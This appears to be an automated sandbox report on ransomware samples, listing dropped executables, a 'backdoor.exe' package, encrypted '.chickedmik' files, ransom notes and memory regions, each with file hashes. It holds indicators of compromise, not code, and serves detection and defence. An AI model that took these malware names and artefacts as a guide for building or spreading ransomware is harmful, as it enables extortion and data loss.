SHA256 ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6
SHA512 a1e0df81d5737834cbcc1dde888f5aca4e1f21fbfa2d6b10782e221a44dadf5d63f8ffcfec44f924ea4a6545730d53d83da35910ec01b6746b1aaaf51733b1e3

C:\Users\Admin\AppData\Local\Microsoft_Corporation\HEUR-Trojan-Ransom.MSIL.A_Url_hyzi2c1yzof5lmdswpn0aowbvgq0vrgi\10.0.17134.1\user.config

MD5 8e9ad862b6889e10924f38d947c3d32c
SHA1 8dc1babaa126ae32f1ff5a9c1d08c259ecafbd70
SHA256 a4c828fd03725bf3ebbf4c4adbe40b5bfe70442cf89aced31cebedb4965cb749
SHA512 400883a5b7f5eeef2d1f38e3d91f64ffe96686c0d4ef0f81de8bd8a03f591e10835512426a831386f6c8a0cda8c6aca546eda34c37dee01791ea14af1fa8c385

memory/3396-211-0x0000000007410000-0x0000000007476000-memory.dmp

memory/1216-223-0x0000000000790000-0x0000000000B5A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft_Corporation\HEUR-Trojan-Ransom.MSIL.A_Url_hyzi2c1yzof5lmdswpn0aowbvgq0vrgi\10.0.17134.1\ncl8f0dh.newcfg

MD5 aeef554f7bb401110b7c50c2f1a75abe
SHA1 a27900dc1f94186caaeffc21cb90d8d0db38122c
SHA256 fe13fc40951dea3c476fa603d87cf31c0e3c740ed37e28dd463db1b6a36a676c
SHA512 db1086b775daf0712814b5f73a67c1da099bd71a83794313643cd5dbb8fcebc2d4387427208cc7dbf2829758dab42c6a423ed7c34c3c71d82961dfa53a47e39c

memory/1448-232-0x00000000009D0000-0x00000000009DC000-memory.dmp

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe

MD5 a2c3e21b413d84fd8b1042f7406c1e85
SHA1 dc7649c6893a64371cf991523a62de36b5dd991e
SHA256 0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff
SHA512 53ba022a28670728c0134f60bc3b784069ae956d047a68779ce06a9aff4ee5839d1ba3513416ed0c22e4d218f8b7aa8df3b551b2b5ead4056e39c93ff08f27be

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe

MD5 dc8225b874f6f79023eecede84591549
SHA1 6ac8b72bab5c4849238efbc1eb763a07801b90dd
SHA256 d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823
SHA512 ce54ead3f6b5ab062a7ff4390b36e1ae043d4196780121372bc11343aa23885bb624593109261bbf95cb1c477d4d7dbaf50bd0e7456386d22825c52441a9a006

memory/928-243-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

MD5 4a6651681f59dfa4a1a228a6d92a62cb
SHA1 5a95d72ec83668992837fb1bffb0d96a90f23ea0
SHA256 9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a
SHA512 be93f6d97f980c8d85f98d4fd6e07333d987a02305d56f4c1a6a40b099fad3e95cf24afb1f6dc7c4b25b3d467183e18f0289772f3068f24b57048cd16a725951

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe

MD5 153c5b9bb7590a23c6a75259c5dd70f3
SHA1 e82069d4144e069b94ba51ec490e5a1cb9996286
SHA256 f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d
SHA512 e46f86dde80e23bf6b306a7c9c9b439e36923811511c0c895b3a0956c0f1db66fba8855b03c8b8f71fb26e2d2033e35f7759a94634b0848f11258fcf7c385b82

memory/4576-265-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI41642\python27.dll

MD5 838972583b872f2c503ec88f3cdf55c7
SHA1 1e594b264f2ce7a4d621aef2bb7bc65343799b34
SHA256 fe55c3ad1e217ada3a1938f3f1fc7ad2d60e2e9fdf02ef751d6d0d2471350301
SHA512 66dfd0671844674e5d8052be4b203617e0538dddd4d2c87159d3bce7f4cf6759248169c9dc444f472bed33b3bc5a005e664353fe194860e78762a36b8e0ce338

C:\Users\Admin\AppData\Local\Temp\_MEI41642\backdoor.exe.manifest

MD5 5d3d187f76000b0e613abbf378c6c410
SHA1 45dd9addadc5bd8815b995197ebc92bacece814e
SHA256 f63a06eba4440c421cc75855fee87d32f2810ffb5ab8bb33c72d7d3da56afaeb
SHA512 0459610a779312fc6ae6f03132653f03958c64c02cae6b2eed95678a857c8097c1b1ea1d2f9b54fd39b1cc1e01dbbd9ffa346581cd332f29f2aa0ab162efcc7c

C:\Users\Admin\AppData\Local\Temp\_MEI41~1\bz2.pyd

MD5 f42a2fe6bb38e14cc0282ff85dbc8366
SHA1 2a83aa37c7820e027f500579be86374a394a8ae1
SHA256 72411f5d024cf86753ef40cbeacf564fb71410760035360f2c89932594082f5c
SHA512 9c57be42d93af4ec10cdb84006b4a1c598485aefad8e93f6d0e3c9ab13298aa7514dbb8d7e1daf9c0d901b0224ecf8c3714961bddbdafed94aa7f9aa557293e8

C:\Users\Admin\AppData\Roaming\Cntrlphse.exe

MD5 9c0b36c4e2475f9351a38b5cde98dcf6
SHA1 ed7da91f04af98e43fd86be1bbe13ad6a3eba765
SHA256 0553a45649cd95b0da3c3b57bd9ae7b0419612f1915905b46709c13a4b23f7c3
SHA512 9faa539c348a014a24af80e6572ec8972e0ed5cb6a1f026cdf5a56335fb802951c181dc04f9fbc6662ee6ebd1423673a2a9c9ec05ced590a23dd771e33f7230d

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

MD5 673e2a417475831d1aba63a2d77b1780
SHA1 336c1294113bf68e6a0018729b9f304d0ec80e54
SHA256 70dd320aaa397a3fd02dabc786d6c2b715754bb31a0c45ec1e338f135de91320
SHA512 dfc00b0d9af7736ddc71871006766b630aa5b7bde1e2cbcb1842cc6d48a2bec53e171dd91c0ce281810a1b5efc5dbf5bf61160683a1df19d09d99f47051dd692

memory/928-297-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe

MD5 c99e9d01743ad7e080344003b8f6b6b1
SHA1 2b878de1c39aeadda71ebbd9b591a9190955c804
SHA256 fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693
SHA512 4ae96dbe25cf2fd5c016c78d19cb442a8e94cd28df746f6b0b09681f5b30ae9676005e920d760ac985c10021d3c15b030249756927330692238f5c2109e446de

C:\Users\Admin\AppData\Local\Temp\_MEI41642\_ssl.pyd

MD5 1b4639e2970bc4a12e0715f161c26e15
SHA1 69c9f8152410380ae4e2465d1711c6d577f7da96
SHA256 260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774
SHA512 2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

C:\Users\Admin\AppData\Local\Temp\_MEI41642\_socket.pyd

MD5 542726bb334376b4ee0b20cb19853cbb
SHA1 66f88bffce320371e208b5993313b1d84e234dbf
SHA256 ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279
SHA512 3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

C:\Program Files\7-Zip\7-zip.chm.exe

MD5 8f32fe0be342c4030bd1ba8ebf11d1b8
SHA1 5e7f2800f2a885f61b8edaabce27c9286f74beb6
SHA256 2da7ba984a247d4a27c3c89e634eaa0ddfee60b6f8ddea5cecb9a7bdea22087e
SHA512 d73b58c66f822d243bd0487a673fb43c654d1d27768f8ac52417dd4d450dcfbf2eee5ef2bdfad4f352785faeff747095b3a1a8a803c485b8f4b41a69a087e15d

memory/3180-254-0x0000000000400000-0x00000000005BB000-memory.dmp

memory/4164-253-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe

MD5 6e98d5dd95d00369316ba548e3c625b3
SHA1 d98da136d22d8e06079a1ce991aa3fc2d95bf186
SHA256 eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7
SHA512 8da6ba5ece6e76be8551b964b6e3c4ff77ddab56d35d1347ed5304a36f82acf398a348d97c81d4d41178de86cc2bde55671587428c465c46d65d9fd578158792

C:\Users\Admin\Desktop\RegisterUnregister.mpeg3.chickedmik

MD5 9dc595c7930adaefcc0eb36f4851264f
SHA1 c33691b47b5af290d71fc7a21b08dbd35ffa365c
SHA256 9c7658b047cbf86d524a2bb095da773822526f958f7766606ea1ad8ed9f9d14e
SHA512 599a845b01d232441bfc0af4761432a6622f317b8ba753ab8e4df76ef4ea7e5c7e8b57f814a1211b384b07f844f52ee07f2ea583478efe5fb193497844d9da7c

memory/7188-848-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe

MD5 dc388a09ad16fcbc7c55ee04f2a087f0
SHA1 8c4127428441d6bec292889e5bbc9cb5a18ae70d
SHA256 cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087
SHA512 ced9e20a6d5488fef2800d9174775815d023013ab8cde2b44707f413fd0a7dfd3832a2fae64e6ab142adc7fa899ff689c65fb5d022184a5db9b3c902414613df

C:\Users\Admin\Desktop\RegisterBackup.mpv2.chickedmik

MD5 35ddd66655b7dd3d2353eb3869b43f67
SHA1 3d7b618fe0724f04971bf92c837943f1508f5f4e
SHA256 0ad66fd427322f986a7b891c237415d4cb3a6432f1062d59ac758f36de057c85
SHA512 cf01e539fdce6de518cbb781eae53ce7258aa8de7c0faeea74a8ad0628759fe11f608fe20f594d36cbce846d61d54a7c4df8724b185409d0d1bce84ee7f885fd

C:\Users\Admin\Desktop\PushSplit.aif.chickedmik

MD5 fcd8526b2ddc2cc743a197ca8c557e84
SHA1 1d8aba7b31fb489731f22387e8b56c922b485218
SHA256 413a0ec678a7139b30d2f471b6a72fa50029c228f9e7766946ee8b097e985719
SHA512 5d96ad062e69065f35c4b71a6f2635572ab057c09a04648ba9f6e4a159a33ca3de3314205d3ea704586f645d4e2a3b11ee7f02afff1cee15cf04845eb5089430

C:\Users\Admin\Desktop\PopUndo.vbe.chickedmik

MD5 c9f2bb9f100db181a54480a145b3d689
SHA1 1badfda5ee70b12cca02a6a10e3ab5b9685af865
SHA256 aa4bc9607c6734eb0644140b519d054bb20ad3ef1ccd9f7380ac2ce777de845b
SHA512 7cfc057d965f83a1631e985fad50307a8f8bc768329e5a1568b3318991173e6e5940f4e135c7b70461e5f6adc0861f4082ce456bf312abe9ff9c9aab0884261f

C:\Users\Admin\Desktop\MountClose.wmv.chickedmik

MD5 7c78405d22de63134dc18b0339eccd93
SHA1 77f65d9e6e424bfdd4d19d2338ba39ffbc89f71d
SHA256 4355e0c95819f47ad7d8143bc91a080d453bc0aa25d9922f164184cfde1bc3f4
SHA512 c49dc490b2db71938b2fa6c8c54b7c29d4d7dc33e35c712af1e4fb106e4b04d94e78b5ea9474d7171fadef18c577d3d383206540cbe218bce2be80ed1ab511d1

C:\Users\Admin\Desktop\Microsoft Edge.lnk.chickedmik

MD5 e445b1bfbf2371f4a31d45f36799f6f5
SHA1 34ece4ffca6649cdb6324d4aeb1296f076866889
SHA256 0463e97e841b8799143af90881f010c591da707067e47f8945a6186d517757f5
SHA512 3b90628821ad279b8a29d7be93bfbae40536da8633a454e3c49919f4859f19a9b7f8d25d84321d25b78e95c6cd5476406f5cc6d31703284e44310e2d06d3b444

C:\Users\Admin\Desktop\MeasureStart.dwg.chickedmik

MD5 e484d316af296c2370603abe5553bb91
SHA1 d4cfd4c554faa99d7198383937ecd17895e2ec7f
SHA256 69c4fe867786f6326809c2be4bc0ada57ea188e9454f29bd7e8747f538001d7e
SHA512 effacb48ee7e564b851cf0216bca65110530998537288e304309efe2b714aa310ce38ea2c7f94fcada5c38a2b1829e9ac19d4ff9e5c71724acad989d09754ec4

C:\Users\Admin\Desktop\MeasureImport.vbe.chickedmik

MD5 82df88306ac8a4af2d298ece500bf271
SHA1 fa2f8c7c55d159294622f849303fcc16596b0aee
SHA256 0cdb39e281e037db607e43b13c075db4adbccd008c630ab052d4044ea5fb52a1
SHA512 132d6ab62824b7fae8461bb6d74b46a56d6cc6f90fb892bb3730eeca846ff826205f8c6139e5c1e6fe0af85f5657de534d659a01e11fd74d3af00526a01af87d

C:\Users\Admin\Desktop\LimitOptimize.MOD.chickedmik

MD5 64875997c3eb0076ffba138fdea273b6
SHA1 dbf28dc9c0ad57e7d2b828b24ca8f3b5acc217fa
SHA256 d14f5f150508318c3e4bb8c1103e3001ef67f2c151ea39d7442e3dc2786caa9e
SHA512 b6c1369af30947121ee136e77367c583246f12f3e0681408f1faba8ecf1ddcbf883c4ae8e582f202f276a2c4fedc6d8f9eeebe56f91b3cb88fd9404c908930df

C:\Users\Admin\Desktop\JoinOptimize.ttf.chickedmik

MD5 47e951728d7ad96cba0034c37e159aad
SHA1 467a1d26420337cf78f78c9c71790a724ef5c6a6
SHA256 45133150afe6f50c0191d8e5cb50fd1bf6a1b06709c17e575fe25c91b955c002
SHA512 c9035252d57c61fe25a2c42950730bbbdf1596ca9d16db316e1ffbb52305d98965ebf143a408daad64c7421a77c4de0b2b3049af72cec4b71efa8259661dacf4

C:\Users\Admin\Desktop\JoinEdit.dib.chickedmik

MD5 0f1bd8926f8f32c4f23ed5714adca85c
SHA1 202acc2eec81db3e4ae7bd7fc27e04ee122d9de3
SHA256 23f2f257dfb6b6c6feefb25eee200ddc1ab908b45ee9c1520775412ecbf52777
SHA512 a6bc5ef4601b44b30c8f36c0053c57541cac2a8eec5d165de65c53cf8843110a124b1364f67bab7d397871867096ed62d3637ab57fe898cb380ae43e3e7ce2b2

C:\Users\Admin\Desktop\ImportInvoke.wmf.chickedmik

MD5 dd4d9a2f0a4d32100640f81501550a84
SHA1 ae1a525510e801daaf6c65973fa965de8a92e42a
SHA256 4ca6250e9fa55509c7d683e1fc91d677e367908a29e3016c4b37a4122300842d
SHA512 3b231fd07af4f25e3062e4ee2bd5dbb593803262144723db769db58837098f7f73cd14cfeaa3d1544a1ca70425fec593e44e75f4d0e5cc80c9afaaf104f4a9fa

C:\Users\Admin\Desktop\GroupExport.xlsx.chickedmik

MD5 cec8ef3a0caef451b4987e56e5847c21
SHA1 e115ce0298bebd7284f7a27f83e1d5190a79e5fd
SHA256 f60f2958d136a6bdfad31c1d9e851d6568d59c22f54478d5b50573efc60efc6e
SHA512 c0a81f9ac75bf78bd0861158b9604572e7420a2effc1158d611dd7f7bd48156ecb03b566f4e92559af4431e7e14458e71f87ef0270b389b73099d1a2dd01c1b0

C:\Users\Admin\Desktop\ExportSuspend.cfg.chickedmik

MD5 2d6113d603aaa158f7c1f6906f458cfd
SHA1 261723cbceb44ad96dde0d4670e4261c5824313d
SHA256 6cd5266839830eade5acf595d66faa345907cd1db0804844d4fb177420bbdb8b
SHA512 ae899489f9f143c85a442660b75f6fa5065de6fdf1959379f4cdc756aceafc515b6f8a8c69210abaa7ca36329072fd09f77fc13aedd610abbfd69c54e6e92be4

C:\Users\Admin\Desktop\ConnectUpdate.dot.chickedmik

MD5 aec1788704890c302d966867ba140128
SHA1 266b5522bf41f94a1e7fd938d064314f80503516
SHA256 390e852b5ea6c86fc680bb2d4e11c118b09ef0957fb1af89c29fdaf0ae480427
SHA512 b48c701c5905791c10e94362d67335fa280aa55b7d99cf548fbea039e7d357fe91eac9edb4eedbb1e42e249f084831263c5596ade279ddbdadba965dd570d418

C:\Users\Admin\Desktop\CheckpointInstall.vssx.chickedmik

MD5 d558c0805508c586500ba5f000584c45
SHA1 b293b35229164469cd9778b875657f59c1e681f0
SHA256 c99d3142dcf7234edd344408d481d487fb979f7c5d1c97697b1f782989faea3e
SHA512 1aa2aaa6bdf1fb3151de9595fb93540ff5ea875ea43a79e7afbb1d225384ff1fb1ac3d8e39c0fed8e92ca00ac89004dbf52d83160b33ec146b0ea2a4886ad9a6

C:\Users\Admin\Desktop\AddMove.xlsx.chickedmik

MD5 b94d78a46a60357c7b01da2f1f1c62fd
SHA1 866b794f0a05464807d06db9c700d0f2065ea26d
SHA256 9f1bd3e80cf6d297fcd9716403eb8eae372965226817fad305bef4e23f9f0851
SHA512 5e2def37ab65cb504c7b6b3f34c45976b2a1eb24fa7e4093bb31fec913a0f7bb2847df89021c9b2e43ee1317e08687ed1826bd652d91724891e1a62169dcffdb

C:\GET_YOUR_FILES_BACK.txt

MD5 d90d05a5fea9c28b3bf2b55f808c3a45
SHA1 7774c79c85b4401acfc56002f9e8a3e10e8a7b60
SHA256 8a9b224d68a718e7cd4da069a158408d9c71fb8ecc4e4a6581982d7a35b29cec
SHA512 783d830a0d75911da6878ea58f7191f1438a429e232c63db86e6f09a1bb390ec7ee72f10db1ee695177686cacab24c9e58f61e7d403d75dd9c817c592131170a

memory/3940-868-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\7e1c2faf6a5692aa96a780da183cd4d0_a53bb4ca-6113-48bb-9609-441860fdd0d7

MD5 1a9f6d593f1d125c46f25dfbd8f5a113
SHA1 52b65d65f3e96fa80c8e99c3932afd8906a3c689
SHA256 3ec8577188e9bf641548629d689ced3b088ff434457415edbbfc7a6fb59d80bb
SHA512 553e92a5a76d6ef875473228b307f7911700752f5d491b8ea4f0af2f9edb878ebdfd86928d43771fa5b0e3ad287bc13b53299e40b0a17e2b24ba60bb0fb25068

memory/4576-865-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

memory/4164-864-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

memory/3628-863-0x0000000000400000-0x000000000041DF08-memory.dmp

memory/7188-862-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-861-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.Win32.Generic-2d8ede0c1adfd042a2ece2482244275f62db138692f24187a652995fbf245a32.exe

MD5 c834ff9a9b14b3d123e9d38077c0fff2
SHA1 ee076f70629a1601fa59aa208b2cf0fedb7966df
SHA256 2cb3b699ed772a85ef255127e1f27a7e1082f41d883c6dcfb47f92188b9642f6
SHA512 bae016dae87cdbc2f8d9f1342e63f010ac9d8527c441c319847fb40d377041fdea8a249730ad7f7a171d6ba7646e14165eebde91663c8b189cf2be206a5fba6a

memory/7352-891-0x0000000005A10000-0x0000000006038000-memory.dmp

memory/7352-886-0x0000000003260000-0x0000000003296000-memory.dmp

memory/7352-914-0x00000000063E0000-0x0000000006734000-memory.dmp

memory/7352-913-0x0000000006300000-0x0000000006366000-memory.dmp

memory/7352-912-0x00000000059A0000-0x00000000059C2000-memory.dmp

memory/7188-931-0x000000005F000000-0x000000005F011000-memory.dmp

memory/7188-930-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7352-942-0x0000000006830000-0x000000000684E000-memory.dmp

memory/7352-945-0x0000000006950000-0x000000000699C000-memory.dmp

memory/7352-990-0x0000000007E70000-0x00000000084EA000-memory.dmp

memory/7352-991-0x0000000006D90000-0x0000000006DAA000-memory.dmp

memory/3180-1010-0x0000000000400000-0x00000000005BB000-memory.dmp

C:\Users\Admin\AppData\ChickiMiki Design.exe

MD5 37c874ea223a7bd53f628f04743374a4
SHA1 7c98ac2a90fdfea3eb50341a7945e3a0c7223313
SHA256 463b4b59650ab90bdbb6c5e1110e97106939a70d6cd81e1eec0dd7c5d4e6ca72
SHA512 f8f878265ce26943f69d89f29daa490a1d5c2b1edb84ace0a63084645b65317c5ed2cd6bfa114c0baaae22070c2e6109b23fb6425bc34b832f11dfc607758c22

memory/5960-1101-0x0000000000D50000-0x0000000000D5A000-memory.dmp

memory/4576-1596-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

memory/4164-1602-0x00007FF77AEB0000-0x00007FF77AF17000-memory.dmp

memory/7188-1605-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-2530-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\Desktop\00476\read_it.txt

MD5 b8a00798dd2fa9a47675c6b066ec8306
SHA1 b63321cc77488b4a7c2b39437a90f22c84421e85
SHA256 a8b2ba39a129d6e5d64809a774131b7171cf63c9b9b7a4bbd429cfc67e26e57a
SHA512 c16b6e5bd0e71f26ca0177da72356e95940c8497b774d5ae7c0e26565431a62e12a35ec832491f836707892fce32a748139389dbbfdf3a6a0dd9af068f799a31

memory/7188-4031-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-5976-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-8160-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-10754-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-12587-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7188-12632-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4dd2754d1bea40445984d65abee82b21
SHA1 4b6a5658bae9a784a370a115fbb4a12e92bd3390
SHA256 183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d
SHA512 92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ecf7ca53c80b5245e35839009d12f866
SHA1 a7af77cf31d410708ebd35a232a80bddfb0615bb
SHA256 882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687
SHA512 706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a6c3e308b4668d45955b2868a523d1b1
SHA1 aa8f6ecac769eb57039e6c7451ed84b5e21afd5d
SHA256 7e7555ae2164a05950050b95e4ca8caaa6708a2846424e4d404d13186a61bc33
SHA512 ef621f6bfc1d7f6a0ea7eba8107ad8be4e0754f8c17e20e8c10018e9786fae1011bd1d7c81b92ac8c032e8f2d667f38650642bffdb4cef01b4ee2e4c8402d631

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8c171f01ccb9058df05a67843461d3b3
SHA1 a4134945249087d7cd60dabb7046902da992cfd7
SHA256 53c9f2c4260dc6447016002b4dc50431a2ac12bd96a3a2ca5dc643aff1fc8710
SHA512 35a1934ff3c510159d3d997bf3a0288c06d9d91feebdfd36af53805ae672881851fe2e07c28c18acfd9133f339ae84e46a632822724e6746e5077fc6848ba2a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5961a4ad5f041f8713fa2b724d6138a9
SHA1 2bb096f09a886b829ca947204eea3cc3bd0f876e
SHA256 f7adf48c98ae4b5458fa1419fd92893c7212d8cea68e7281c239973cb72321d2
SHA512 9abe0577014e0a2ed1efd57393203989c61d3236f6c3d10acea77d01c7da9c7803ecb0f2c81c5ce9aa4a65a6b83388ccfb3fe713242b8a8acc2ff63d2d9fd452

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e9a2a28469637ae8efb567263bda102
SHA1 d812e5cd2b03f355705f2bca269c38740688e2d9
SHA256 4fe91e2605609995844ce703d29063d04895edef128ac61b538213098db128e5
SHA512 3d241edc817a55890caa453d309b9724f49be9a4644753c5a9f5bce3cf6d575c274d26b3cdf41381a8f306b7d8b6ac1cdd20fe8c3eccaeaa3751d5928b97908a

memory/3180-15593-0x0000000000400000-0x00000000005BB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5ad245.TMP

MD5 0e70daa8737f6414c829911ea003712b
SHA1 4f6e5508792a4e73f7e695f734e88737cc135228
SHA256 f611c5355243eddacc0f647b024c1ab51a0fee5da8704dccbd556e10a87b80eb
SHA512 bc32a59fdff4e1667adaaa39ff17950c9a27606a654bfaa70cf579459b3e470f47ac76e141bd0acf272b8cba4aa72c715521c6fe694788cacbea4d2eace8b7ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 41dcbdc888d2116f1991f68eca896fd5
SHA1 eb748250fb7df111515a585873cdfaaf0cfd6cc8
SHA256 9bc5c2cfbce619e44106d9f43b7b065cf741a4b7fa06ec74df2766292a2aabcb
SHA512 61a6b48cfe160b1bb52795a28c1344ceed69492d965bf8e9effb517b57c47f3dd708d656ea887c3d881a7fcf9e01e55f229c489463b7005301b5ae6ec7a20726

F:\$RECYCLE.BIN\README.txt

MD5 a37cedf67a012117b57ade1229415b45
SHA1 a0ee65b70bf3199db296e13e8334ecee41b36102
SHA256 d47fc0d58b366cc3994dd776bf78753e06420830790e3885e59c41dd8c32a21a
SHA512 901cc83085087277d701dc0b4768a84c051afa7a8648d5341eb0711fba4903503cd5aea9ad71fbbf082224b0757687b112db68239c2273cfef4491ba84241146

C:\Users\Admin\Documents\OneNote Notebooks\GET_YOUR_FILES_BACK.txt

MD5 83bd141137c030b53d47984db2a760b0
SHA1 0cf203e27596b881fd771791b142359d20c8bb4d
SHA256 91ae1beb8b14086d175f98e865cab5f56110bfb2188f28e7d5f03ae244073ce0
SHA512 c3a5ae58dd34bf5da64971c3c38f7d463c5ef86b7e068fea53615c9c28dae8cd009ad36b31e05cd81ff9434966649202bc78cc2bb83c189911abcb68509cbc2e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a078fb69afcd2b551362f817ff88b752
SHA1 84fcb9a8772baca90d25c468047562a7fbbbfbfa
SHA256 f8ff681036f889051f2acbf41dc234b26335bcf3e4242ca8c24486b82cbf00b9
SHA512 4a32b4edcc1182f322ab733c83b30e9eb66d02bb12c82bace53277069450f046344ad572fe30576c086d842b0992f44f5dd72e9567d3e7ceca7d99c4df6e60a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8f47d84093a40164c7556f2d7ed5bd4f
SHA1 f784182415e013deecc93e8c53c84f9390036b1c
SHA256 00b771590d108b369ee11ee5cc3b437535a7e0b80b9badab5122e71ce17ba91c
SHA512 968af6d57ff6fa6d68f88c1bab14d23c739a7d2cdcecdb7030ee6e97d11a79095e148dfc244c19afd13ccfabbd34c22356bae541052143465d183962b57583c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 23943430a0e697ace7ac8150492db05c
SHA1 3cbe35f57d4d6552425d5e6ae40eb418d872b5ae
SHA256 6ecd3b21bca7371537a3a2a093adfa3192c3931fcce7949bb0ef1a26a74c3b26
SHA512 ca88194d4ab01afeb4fbc9ea6d6e8d1ccc47a3e69be81aa61b5515e4f8ad478c6ac048b32bc3b2b46b9b3a1a37cf717d9667fa6fcb3537a725f022846489a45a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0561a632002527d19662b0bdbb9970ac
SHA1 11320eafd2e6d30b897a8c93cefef4edfbf02632
SHA256 9888661536d2814599003202a9231f0b060fb019e1a131b4670bbeb957743383
SHA512 566dbd4baa9709da412e5b4640a6778936be150fd812fd03c6353a70864940593b541124a488d8aef2b1e3881bf3f806c23bf8428d37f57c5591a445c036e976

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 041064247d01379adce0b5548cee1961
SHA1 dfd1c571f00c4909db619ce36a26f1b4dd92c7cb
SHA256 ef53900b94be0a129723b70f175383a3eb03b06935da6b91c50b686b877a7dee
